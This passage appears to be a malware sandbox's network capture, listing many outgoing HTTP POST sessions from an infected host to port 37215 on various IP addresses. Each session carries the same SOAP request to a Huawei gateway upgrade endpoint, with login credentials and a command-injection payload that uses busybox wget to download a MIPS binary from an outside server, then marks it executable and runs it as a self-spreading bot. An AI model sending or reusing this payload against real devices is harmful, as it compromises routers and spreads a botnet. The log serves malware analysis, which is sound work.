                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1236192.168.2.135689292.178.183.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448714018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1237192.168.2.1350460157.99.137.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448725939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1238192.168.2.1351916157.16.167.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448740005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1239192.168.2.1356892157.248.7.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448762894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1240192.168.2.134954241.6.154.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448764086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1241192.168.2.135438464.134.226.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448776960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1242192.168.2.133848041.73.25.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448776960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1243192.168.2.1349924169.228.102.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448796034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1244192.168.2.133749641.170.206.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448816061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1245192.168.2.134518877.212.26.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448822021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 